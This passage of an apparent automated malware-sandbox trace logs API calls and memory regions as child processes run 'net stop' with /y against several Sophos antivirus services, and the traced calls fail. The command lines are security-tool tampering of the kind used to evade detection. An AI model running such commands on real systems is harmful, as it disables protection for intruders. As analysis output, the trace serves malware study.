HEALTH SERVICE") returned -1 [0083.502] _wcsicmp (_String1="redir", _String2="SOPHOS HEALTH SERVICE") returned -1 [0083.502] _wcsicmp (_String1="rdr", _String2="SOPHOS HEALTH SERVICE") returned -1 [0083.502] _wcsicmp (_String1="workstation", _String2="SOPHOS HEALTH SERVICE") returned 4 [0083.502] _wcsicmp (_String1="work", _String2="SOPHOS HEALTH SERVICE") returned 4 [0083.502] _wcsicmp (_String1="wksta", _String2="SOPHOS HEALTH SERVICE") returned 4 [0083.503] _wcsicmp (_String1="prdr", _String2="SOPHOS HEALTH SERVICE") returned -3 [0083.503] _wcsicmp (_String1="devrdr", _String2="SOPHOS HEALTH SERVICE") returned -15 [0083.503] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS HEALTH SERVICE") returned -7 [0083.503] _wcsicmp (_String1="server", _String2="SOPHOS HEALTH SERVICE") returned -10 [0083.503] _wcsicmp (_String1="svr", _String2="SOPHOS HEALTH SERVICE") returned 7 [0083.503] _wcsicmp (_String1="srv", _String2="SOPHOS HEALTH SERVICE") returned 3 [0083.503] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS HEALTH SERVICE") returned -7 [0083.503] _wcsicmp (_String1="alerter", _String2="SOPHOS HEALTH SERVICE") returned -18 [0083.503] _wcsicmp (_String1="netlogon", _String2="SOPHOS HEALTH SERVICE") returned -5 [0083.503] NetServiceControl (in: servername=0x0, service="SOPHOS HEALTH SERVICE", opcode=0x0, arg=0x0, bufptr=0x18f810 | out: bufptr=0x18f810) returned 0x889 [0083.504] wcscpy_s (in: _Destination=0xffc680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0083.504] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0083.505] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0083.507] GetFileType (hFile=0xb) returned 0x2 [0083.507] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f6d8 | out: lpMode=0x18f6d8) returned 1 [0083.507] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f6d0, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x18f6d0*=0x1e) returned 1 [0083.507] GetFileType (hFile=0xb) returned 0x2 [0083.508] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f6d8 | out: lpMode=0x18f6d8) returned 1 [0083.508] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f6d0, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x18f6d0*=0x2) returned 1 [0083.508] _ultow (in: _Dest=0x889, _Radix=1636160 | out: _Dest=0x889) returned="2185" [0083.508] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0083.509] GetFileType (hFile=0xb) returned 0x2 [0083.509] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f6d8 | out: lpMode=0x18f6d8) returned 1 [0083.509] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f6d0, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x18f6d0*=0x34) returned 1 [0083.509] GetFileType (hFile=0xb) returned 0x2 [0083.510] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f6d8 | out: lpMode=0x18f6d8) returned 1 [0083.510] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f6d0, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x18f6d0*=0x2) returned 1 [0083.510] NetApiBufferFree (Buffer=0x24c0f0) returned 0x0 [0083.510] NetApiBufferFree (Buffer=0x24c110) returned 0x0 [0083.510] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Health Service\" /y" [0083.510] exit (_Code=2) Process: id = "68" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2133d000" os_pid = "0xcf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xe60" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos MCS Agent\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4130 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4131 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4132 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4133 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4134 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4135 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4136 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4137 start_va = 0xffc40000 end_va = 0xffc72fff entry_point = 0xffc40000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4138 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4139 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4140 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4141 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4142 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4143 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4144 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4213 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4214 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 4215 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4216 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4217 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4218 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4219 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4220 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4221 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4222 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4223 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4224 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4225 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4226 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4227 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4228 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4229 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4230 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4231 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4232 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4233 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 408 os_tid = 0xf54 [0083.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f990 | out: lpSystemTimeAsFileTime=0x24f990*(dwLowDateTime=0xe6e1fab0, dwHighDateTime=0x1d48689)) [0083.406] GetCurrentProcessId () returned 0xcf4 [0083.406] GetCurrentThreadId () returned 0xf54 [0083.406] GetTickCount () returned 0x1ebb5 [0083.406] QueryPerformanceCounter (in: lpPerformanceCount=0x24f998 | out: lpPerformanceCount=0x24f998*=1813032400000) returned 1 [0083.407] GetModuleHandleW (lpModuleName=0x0) returned 0xffc40000 [0083.407] __set_app_type (_Type=0x1) [0083.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc59c9c) returned 0x0 [0083.408] __getmainargs (in: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788, _DoWildCard=0, _StartInfo=0xffc6479c | out: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788) returned 0 [0083.408] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.408] GetConsoleOutputCP () returned 0x1b5 [0083.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffc6cec0 | out: lpCPInfo=0xffc6cec0) returned 1 [0083.408] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0083.411] sprintf_s (in: _DstBuf=0x24f938, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0083.411] setlocale (category=0, locale=".437") returned="English_United States.437" [0083.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0083.412] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0083.412] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos MCS Agent\" /y" [0083.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f6d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0083.413] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0083.413] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f928 | out: Buffer=0x24f928*=0x324d60) returned 0x0 [0083.413] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f928 | out: Buffer=0x24f928*=0x32c120) returned 0x0 [0083.413] _fileno (_File=0x7fefdba2a80) returned 0 [0083.413] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0083.413] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0083.413] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0083.413] _wcsicmp (_String1="config", _String2="stop") returned -16 [0083.413] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0083.413] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0083.413] _wcsicmp (_String1="file", _String2="stop") returned -13 [0083.413] _wcsicmp (_String1="files", _String2="stop") returned -13 [0083.413] _wcsicmp (_String1="group", _String2="stop") returned -12 [0083.413] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0083.413] _wcsicmp (_String1="help", _String2="stop") returned -11 [0083.413] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0083.414] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0083.414] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0083.414] _wcsicmp (_String1="session", _String2="stop") returned -15 [0083.414] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0083.414] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0083.414] _wcsicmp (_String1="share", _String2="stop") returned -12 [0083.414] _wcsicmp (_String1="start", _String2="stop") returned -14 [0083.414] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0083.414] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0083.414] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0083.414] _wcsicmp (_String1="accounts", _String2="Sophos MCS Agent") returned -18 [0083.414] _wcsicmp (_String1="computer", _String2="Sophos MCS Agent") returned -16 [0083.414] _wcsicmp (_String1="config", _String2="Sophos MCS Agent") returned -16 [0083.414] _wcsicmp (_String1="continue", _String2="Sophos MCS Agent") returned -16 [0083.414] _wcsicmp (_String1="cont", _String2="Sophos MCS Agent") returned -16 [0083.414] _wcsicmp (_String1="file", _String2="Sophos MCS Agent") returned -13 [0083.414] _wcsicmp (_String1="files", _String2="Sophos MCS Agent") returned -13 [0083.414] _wcsicmp (_String1="group", _String2="Sophos MCS Agent") returned -12 [0083.414] _wcsicmp (_String1="groups", _String2="Sophos MCS Agent") returned -12 [0083.414] _wcsicmp (_String1="help", _String2="Sophos MCS Agent") returned -11 [0083.414] _wcsicmp (_String1="helpmsg", _String2="Sophos MCS Agent") returned -11 [0083.414] _wcsicmp (_String1="localgroup", _String2="Sophos MCS Agent") returned -7 [0083.414] _wcsicmp (_String1="pause", _String2="Sophos MCS Agent") returned -3 [0083.414] _wcsicmp (_String1="session", _String2="Sophos MCS Agent") returned -10 [0083.414] _wcsicmp (_String1="sessions", _String2="Sophos MCS Agent") returned -10 [0083.414] _wcsicmp (_String1="sess", _String2="Sophos MCS Agent") returned -10 [0083.414] _wcsicmp (_String1="share", _String2="Sophos MCS Agent") returned -7 [0083.414] _wcsicmp (_String1="start", _String2="Sophos MCS Agent") returned 5 [0083.414] _wcsicmp (_String1="stats", _String2="Sophos MCS Agent") returned 5 [0083.414] _wcsicmp (_String1="statistics", _String2="Sophos MCS Agent") returned 5 [0083.415] _wcsicmp (_String1="stop", _String2="Sophos MCS Agent") returned 5 [0083.415] _wcsicmp (_String1="time", _String2="Sophos MCS Agent") returned 1 [0083.415] _wcsicmp (_String1="user", _String2="Sophos MCS Agent") returned 2 [0083.415] _wcsicmp (_String1="users", _String2="Sophos MCS Agent") returned 2 [0083.415] _wcsicmp (_String1="msg", _String2="Sophos MCS Agent") returned -6 [0083.415] _wcsicmp (_String1="messenger", _String2="Sophos MCS Agent") returned -6 [0083.415] _wcsicmp (_String1="receiver", _String2="Sophos MCS Agent") returned -1 [0083.415] _wcsicmp (_String1="rcv", _String2="Sophos MCS Agent") returned -1 [0083.415] _wcsicmp (_String1="netpopup", _String2="Sophos MCS Agent") returned -5 [0083.415] _wcsicmp (_String1="redirector", _String2="Sophos MCS Agent") returned -1 [0083.415] _wcsicmp (_String1="redir", _String2="Sophos MCS Agent") returned -1 [0083.415] _wcsicmp (_String1="rdr", _String2="Sophos MCS Agent") returned -1 [0083.415] _wcsicmp (_String1="workstation", _String2="Sophos MCS Agent") returned 4 [0083.415] _wcsicmp (_String1="work", _String2="Sophos MCS Agent") returned 4 [0083.415] _wcsicmp (_String1="wksta", _String2="Sophos MCS Agent") returned 4 [0083.415] _wcsicmp (_String1="prdr", _String2="Sophos MCS Agent") returned -3 [0083.415] _wcsicmp (_String1="devrdr", _String2="Sophos MCS Agent") returned -15 [0083.415] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos MCS Agent") returned -7 [0083.415] _wcsicmp (_String1="server", _String2="Sophos MCS Agent") returned -10 [0083.415] _wcsicmp (_String1="svr", _String2="Sophos MCS Agent") returned 7 [0083.415] _wcsicmp (_String1="srv", _String2="Sophos MCS Agent") returned 3 [0083.415] _wcsicmp (_String1="lanmanserver", _String2="Sophos MCS Agent") returned -7 [0083.415] _wcsicmp (_String1="alerter", _String2="Sophos MCS Agent") returned -18 [0083.415] _wcsicmp (_String1="netlogon", _String2="Sophos MCS Agent") returned -5 [0083.415] _wcsupr (in: _String="Sophos MCS Agent" | out: _String="SOPHOS MCS AGENT") returned="SOPHOS MCS AGENT" [0083.416] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32ce30 [0083.420] GetServiceKeyNameW (in: hSCManager=0x32ce30, lpDisplayName="SOPHOS MCS AGENT", lpServiceName=0xffc65750, lpcchBuffer=0x24f848 | out: lpServiceName="", lpcchBuffer=0x24f848) returned 0 [0083.421] _wcsicmp (_String1="msg", _String2="SOPHOS MCS AGENT") returned -6 [0083.421] _wcsicmp (_String1="messenger", _String2="SOPHOS MCS AGENT") returned -6 [0083.421] _wcsicmp (_String1="receiver", _String2="SOPHOS MCS AGENT") returned -1 [0083.421] _wcsicmp (_String1="rcv", _String2="SOPHOS MCS AGENT") returned -1 [0083.421] _wcsicmp (_String1="redirector", _String2="SOPHOS MCS AGENT") returned -1 [0083.421] _wcsicmp (_String1="redir", _String2="SOPHOS MCS AGENT") returned -1 [0083.421] _wcsicmp (_String1="rdr", _String2="SOPHOS MCS AGENT") returned -1 [0083.421] _wcsicmp (_String1="workstation", _String2="SOPHOS MCS AGENT") returned 4 [0083.421] _wcsicmp (_String1="work", _String2="SOPHOS MCS AGENT") returned 4 [0083.421] _wcsicmp (_String1="wksta", _String2="SOPHOS MCS AGENT") returned 4 [0083.421] _wcsicmp (_String1="prdr", _String2="SOPHOS MCS AGENT") returned -3 [0083.421] _wcsicmp (_String1="devrdr", _String2="SOPHOS MCS AGENT") returned -15 [0083.421] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS MCS AGENT") returned -7 [0083.422] _wcsicmp (_String1="server", _String2="SOPHOS MCS AGENT") returned -10 [0083.422] _wcsicmp (_String1="svr", _String2="SOPHOS MCS AGENT") returned 7 [0083.422] _wcsicmp (_String1="srv", _String2="SOPHOS MCS AGENT") returned 3 [0083.422] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS MCS AGENT") returned -7 [0083.422] _wcsicmp (_String1="alerter", _String2="SOPHOS MCS AGENT") returned -18 [0083.422] _wcsicmp (_String1="netlogon", _String2="SOPHOS MCS AGENT") returned -5 [0083.422] NetServiceControl (in: servername=0x0, service="SOPHOS MCS AGENT", opcode=0x0, arg=0x0, bufptr=0x24f850 | out: bufptr=0x24f850) returned 0x889 [0083.423] wcscpy_s (in: _Destination=0xffc680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0083.423] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0083.424] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0083.426] GetFileType (hFile=0xb) returned 0x2 [0083.426] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f718 | out: lpMode=0x24f718) returned 1 [0083.426] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f710, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x24f710*=0x1e) returned 1 [0083.426] GetFileType (hFile=0xb) returned 0x2 [0083.427] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f718 | out: lpMode=0x24f718) returned 1 [0083.427] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f710, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x24f710*=0x2) returned 1 [0083.427] _ultow (in: _Dest=0x889, _Radix=2422656 | out: _Dest=0x889) returned="2185" [0083.427] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0083.428] GetFileType (hFile=0xb) returned 0x2 [0083.428] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f718 | out: lpMode=0x24f718) returned 1 [0083.428] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f710, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0x24f710*=0x34) returned 1 [0083.428] GetFileType (hFile=0xb) returned 0x2 [0083.429] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f718 | out: lpMode=0x24f718) returned 1 [0083.429] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f710, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0x24f710*=0x2) returned 1 [0083.429] NetApiBufferFree (Buffer=0x324d60) returned 0x0 [0083.429] NetApiBufferFree (Buffer=0x32c120) returned 0x0 [0083.429] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos MCS Agent\" /y" [0083.429] exit (_Code=2) Process: id = "69" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1af19000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos System Protection Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4145 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4146 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4147 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4148 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4149 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4150 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4151 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4152 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4153 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4154 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4155 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4156 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4157 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4158 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4159 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 409 os_tid = 0xd00 Process: id = "70" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x22e38000" os_pid = "0xffc" os_integrity_level = 